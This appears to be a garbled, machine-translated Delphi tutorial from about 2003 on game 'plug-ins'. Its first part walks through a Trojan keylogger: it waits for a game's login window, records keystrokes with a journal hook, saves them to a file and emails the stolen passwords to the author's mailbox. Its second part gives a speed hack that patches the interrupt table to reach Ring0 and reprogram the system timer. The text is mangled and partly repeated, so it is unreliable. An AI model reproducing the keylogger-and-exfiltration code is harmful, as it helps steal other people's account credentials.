Previously introduced the action, the local modified plug-in is a true plug-in, and today, the Trojan plug-in, which may introduce it, may be like Trojans, it is to help the plug-in person to steal the account and password of others. east. Because there is such an external existence on the network, I have to say today (I personally hate this plug-in, please see this technology, thank you for your cooperation). To do this plug-in program implementation method (such as Hook, Keyboard Monitoring and other technologies), because Hook technology is relatively high for programmers and needs more dynamic link libraries in practical applications, I will take them in the text. Keyboard monitoring technology to achieve this type of Trojan. Keyboard monitoring technology only needs one .exe file to achieve background keyboard monitoring, this program is more suitable for this technology. We must understand the idea of the program before making a program: 1. Let's first know that you want to record the name of the login window. 2. Judging whether the login window appears. 3. If the login window appears, log the keyboard. 4. When the window is closed, the record information is sent to the programmer's mailbox.
I don't have a specific analysis of the first point, because you have to know what game you play, what is the name of the login window. From the second point, let's start this type of plug-in program implementation: So how do we judge whether the login window does not appear? In fact, this is very simple, we can easily implement it with the FindWindow function: hWnd FindWindow (LPCTSTSTSTSTSNAME, / / POINTER TO CLASS NAME LPCTSTSTR LPWINDOWNAME / / POINTER TO WINDOW NAME); the actual program implementation, we have to find 'XX' Window, use FindWindow (NIL, 'XX') if the window has appeared when the return value is greater than 0, then we can record the keyboard information. First song we use SetWindowsHookEx set up monitoring logs, and usage of this function is as follows: HHOOK SetWindowsHookEx (int idHook, // type of hook to install HOOKPROC lpfn, // address of hook procedure HINSTANCE hMod, // handle of application instance DWORD dwThreadId / / Identity of Thread to install hook for; here to explain that we have to do this in our program, we must implement it by writing a function, Hinstance here, we can use this program's Hinstance, specific implementation method: hHook: = SetWindowsHookEx (WH_JOURNALRECORD, HookProc, hInstance, 0); and HOOKPROC will function in a little more complex: function HookProc (iCode: integer; wParam: wParam; lParam: lParam): LResult; stdcall; begin if findedtitle then // if widget discovery begin if (. peventmsg (lparam) ^ message = WM_KEYDOWN) then // message is equal to key presses hookkey: = hookkey Form1.Keyhookresult (peventMsg (lparam) ^ paramL, peventmsg (lparam). ^ .Paramh); // With keyhookresult (custom function, the main function is to convert the intercepted message parameters as the button name. I will convert messages in the end of the document). If Length> 0 Then // If you get the key name begin write (hookkeyfile, hookkey); // Write the button name to the text file hookkey: = '; end; end; end; or more is the process of recording the entire process of the keyboard , Simple, if the record is not forgotten, UnHookWindowsHookex (HHOOK), and hHOOK, is the handle returned after Creating SetWindowsHookex. We have got a record of the keyboard, so now, just send the recorded information back, we have caused it. Other sends this piece is not very difficult, just read the record from the text file, I will send it to the email component comes with Delphi.
The code is as follows: assignfile (readfile, 'hook.txt'); // Open hook.txt This text file reset (// Set to read how to readfile Do // DO // When not read Tail BeGin Readln (ReadFile, S, J); // Read file line body: = body s; end; finally closefile (readfile); // Close file end; nmsmtp1.encodetype: = UUMIME; / / Setting Code NMSMTP1 .Postmessage.attachments.text: = ''; // Set attachment nmsmtp1.postMessage.Fromaddress: = 'xxx@xxx.com'; // Set source mail address nmsmtp1.postMessage.toaddress.text: = 'xxx @ xxx. Com '; / set the target email address nmsmtp1.postMessage.body.text: =' password ' ' ' body; // set the mail content nmsmtp1.postMessage.Subject: =' password '; // Set the message title NMSMTP1.SENDMAIL ; //send email
2003-5-15 10:38:09
I haven't figured out how to make acceleration plug-in, until the second half of the 2001 second half of the 2001 "" Transmission gear "research incorporated" "Transmission gear" student "reassembled, only one I was aware of it, followed by Delphi, I will talk about my experience to everyone, and thank the "Transmission gear" study "author Yan Rui gave a prompt. I will not say nonsense, then began magical accelerated plug-in experience! Originally I always thought that accelerated pluging was written for a game. Later, I found that this concept is wrong. The so-called acceleration plug is actually the purpose of modifying clock frequencies to acceleration. In the past DOS era, people played programming immediately thought that this is very simple, it is not to change the 8253 register. This may be able to travel in the previous DOS era, but Windows is not.
Windows is a 32-bit operating system, isn't you want to change? (Microsoft's stuff is so domineering, say no change to you, do not change it to you, but do not impossible We can implement two methods: The first is to write a hardware driver to complete, the second is to implement it with RING0 (this method is CIH author Chen Yinghao first, its principle is to modify the IDT table -> Create a interrupt gate -> Enter Ring0-> Call the interrupt modification vector, but there is no way to use ASM assembly to achieve this * _ *, as a high-level language user!), Use the first method to trouble with the first method So we use the second method here ~~~ We will come to think about our ideas before implementation: 1. Let's first write a process to embed the assembly language in this process to achieve the IDE table, create interrupt gate , Modify the vector and other work 2, call this process to achieve the acceleration function, now there is, we will see the code while explaining: First we build a process, this process is the core part of this program: Procedure setRing Value: word); stdcall; const zdh = $ 03; // set a interrupt number VAR IDT: Array [0..5] of byte; // Save the IDT table OG: DWORD; // Store the old vector Beginasm Push EBX SIDT IDT // Read Interrupt Description Mark EBX, DWORD PTR [IDT 2] // IDT Subterite Add EBX, 8 * ZDH // Calculation Interrupt In Interrupt Descript Table CLI // Off Interrupt MOV DX, Word PTR [EBX 6] SHL EDX, 16D MOV DX, WORD PTR [EBX] MOV [OG], EDX MOV EAX, OFFSET @@ Ring0 // Pointing Ring0 Grade Dip Segment MOV Word PTR [EBX], AX // Low 16-bit, save at 1, 2-bit SHR EAX, 16D MOV Word PTR [EBX 6], AX // High 16-bit, save in 6, 7-bit int zdh // interrupt MOV EBX, DWORD PTR [ID T 2] // Reposition Add EBX, 8 * ZDH MOV EDX, [OG] MOV WORD PTR [EBX], DX SHR EDX, 16D MOV WORD PTR [EBX 6], DX // Recovered Vector POP EBX JMP @@ EXIXTASM / / EXITASM @@ Ring0: // Ring0, this is the most core Dongdong MOV Al, $ 34 // Write 8253 Control Register Out $ 43, Al Mov Ax, Value //
Write the timing value OUT $ 40, Al // Write value low MOV AL, AH OUT $ 40, Al // Wr // Return @@ EXITASM: END; END; The most core thing has been finished, most The reader is aware of it, I don't know how it is, huh, but I don't know how it happens. Let's try to use this process to do a place similar to the "shifting gear"! Put a window first, put a TrackBar control on the window to set it to 20, MIN is set to 1, set the position to 10, write on this control: setring (string ('$' INTOSTR) (1742 (10-TRACKBAR1.POSITION) * 160)))))))))))))))))); because of the default value of Windows is $ 1742, we do 1742 as a base, but because the value is, the faster, the thoroughly slowed, so write this way A formula, okay, this is a Delphi ASM version of "shifting gear" (only for Win9x), huh, try it, this will help you, huh, huh. In Win2000, we can't achieve it directly, Ring0 is also lost, and some people will think that we can write drivers to complete, but here I tell you, Windows2000 drivers are not a VXD It can be realized, like my low hand does not write the drive WDM used by Windows, there is no way, I only have a good implementation, Prottalk is a good device driver, which is very convenient to achieve low-level ports. Operation, thereby achieving acceleration plugging. 1. Let's first have the next porttalk driver. His official website is http://www.beyondlogic.org2, we have to copy the protttalk.sys inside. 3, build a protalk.sys interface (I want to omit, everyone can go at http://www.freewebs.com/liuyue/porttalk.pas Next PAS file yourself) 4, achieve acceleration plug-in. Originally, I didn't want to talk about it. I didn't want to talk too much. Let's talk about the implementation of this program. If you use Prottalk to operate the port is much easier, which is easy to operate with RING permission than Win98. 1. Create a new project to copy the interface files and protalk.sys to the folder saved by the project file. 2, we join our newly built project Useswindows, Prottalk ... 3, we create a process Procedure String (Value: Word); Begin if not openporttalk kiln exit; OutportB ($ 43, $ 34); OUTPORTB ($ 40, LO (Value); Outprotb ($ 40, HI (Value)); ClosePostTalk; End; 4, first plus a window, put a TRACKBAR control on the window to set it to 20, MIN is set to 1, set the position For 10, write on the Change event of this control: String ('$' INTOSTR (1742 (10-trackbar1.position * 160))));
NMSMTP1.POSTMESSAGE.BODY.TEXT: = 'Password' '' body; // Set the mail content nmsmtp1.postMessage.subject: = 'password'; // Set the mail title nmsmtp1.sendmail; // Send Email 2003-5 -15 10:38:09
I haven't figured out how to make acceleration plug-in, until the second half of the 2001 second half of the 2001 "" Transmission gear "research incorporated" "Transmission gear" student "reassembled, only one I was aware of it, followed by Delphi, I will talk about my experience to everyone, and thank the "Transmission gear" study "author Yan Rui gave a prompt. I will not say nonsense, then began magical accelerated plug-in experience! Originally I always thought that accelerated pluging was written for a game. Later, I found that this concept is wrong. The so-called acceleration plug is actually the purpose of modifying clock frequencies to acceleration. In the past DOS era, people played programming immediately thought that this is very simple, it is not to change the 8253 register. This may be able to travel in the previous DOS era, but Windows is not.
Windows is a 32-bit operating system, isn't you want to change? (Microsoft's stuff is so domineering, say no change to you, do not change it to you, but do not impossible We can implement two methods: The first is to write a hardware driver to complete, the second is to implement it with RING0 (this method is CIH author Chen Yinghao first, its principle is to modify the IDT table -> Create a interrupt gate -> Enter Ring0-> Call the interrupt modification vector, but there is no way to use ASM assembly to achieve this * _ *, as a high-level language user!), Use the first method to trouble with the first method So we use the second method here ~~~ We will come to think about our ideas before implementation: 1. Let's first write a process to embed the assembly language in this process to achieve the IDE table, create interrupt gate , Modify the vector and other work 2, call this process to achieve the acceleration function, now there is, we will see the code while explaining: First we build a process, this process is the core part of this program: Procedure setRing Value: word); stdcall; const zdh = $ 03; // set a interrupt number VAR IDT: Array [0..5] of byte; // Save the IDT table OG: DWORD; // Store the old vector Beginasm Push EBX SIDT IDT // Read Interrupt Description Mark EBX, DWORD PTR [IDT 2] // IDT Subterite Add EBX, 8 * ZDH // Calculation Interrupt In Interrupt Descript Table CLI // Off Interrupt MOV DX, Word PTR [EBX 6] SHL EDX, 16D MOV DX, WORD PTR [EBX] MOV [OG], EDX MOV EAX, OFFSET @@ Ring0 // Pointing Ring0 Grade Dip Segment MOV Word PTR [EBX], AX // Low 16-bit, save at 1, 2-bit SHR EAX, 16D MOV Word PTR [EBX 6], AX // High 16-bit, save in 6, 7-bit int zdh // interrupt MOV EBX, DWORD PTR [ID T 2] // Reposition Add EBX, 8 * ZDH MOV EDX, [OG] MOV WORD PTR [EBX], DX SHR EDX, 16D MOV WORD PTR [EBX 6], DX // Recovered Vector POP EBX JMP @@ EXIXTASM / / EXITASM @@ Ring0: // Ring0, this is the most core Dongdong MOV Al, $ 34 // Write 8253 Control Register Out $ 43, Al Mov Ax, Value //
Write the timing value OUT $ 40, Al // Write value low MOV AL, AH OUT $ 40, Al // Wr // Return @@ EXITASM: END; END; The most core thing has been finished, most The reader is aware of it, I don't know how it is, huh, but I don't know how it happens. Let's try to use this process to do a place similar to the "shifting gear"! Put a window first, put a TrackBar control on the window to set it to 20, MIN is set to 1, set the position to 10, write on this control: setring (string ('$' INTOSTR) (1742 (10-TRACKBAR1.POSITION) * 160)))))))))))))))))); because of the default value of Windows is $ 1742, we do 1742 as a base, but because the value is, the faster, the thoroughly slowed, so write this way A formula, okay, this is a Delphi ASM version of "shifting gear" (only for Win9x), huh, try it, this will help you, huh, huh. In Win2000, we can't achieve it directly, Ring0 is also lost, and some people will think that we can write drivers to complete, but here I tell you, Windows2000 drivers are not a VXD It can be realized, like my low hand does not write the drive WDM used by Windows, there is no way, I only have a good implementation, Prottalk is a good device driver, which is very convenient to achieve low-level ports. Operation, thereby achieving acceleration plugging. 1. Let's first have the next porttalk driver. His official website is http://www.beyondlogic.org2, we have to copy the protttalk.sys inside. 3, build a protalk.sys interface (I want to omit, everyone can go at http://www.freewebs.com/liuyue/porttalk.pas Next PAS file yourself) 4, achieve acceleration plug-in. Originally, I didn't want to talk about it. I didn't want to talk too much. Let's talk about the implementation of this program. If you use Prottalk to operate the port is much easier, which is easy to operate with RING permission than Win98. 1. Create a new project to copy the interface files and protalk.sys to the folder saved by the project file. 2, we join our newly built project Useswindows, Prottalk ... 3, we create a process Procedure String (Value: Word); Begin if not openporttalk kiln exit; OutportB ($ 43, $ 34); OUTPORTB ($ 40, LO (Value); Outprotb ($ 40, HI (Value)); ClosePostTalk; End; 4, first plus a window, put a TRACKBAR control on the window to set it to 20, MIN is set to 1, set the position For 10, write on the Change event of this control: String ('$' INTOSTR (1742 (10-trackbar1.position * 160))));
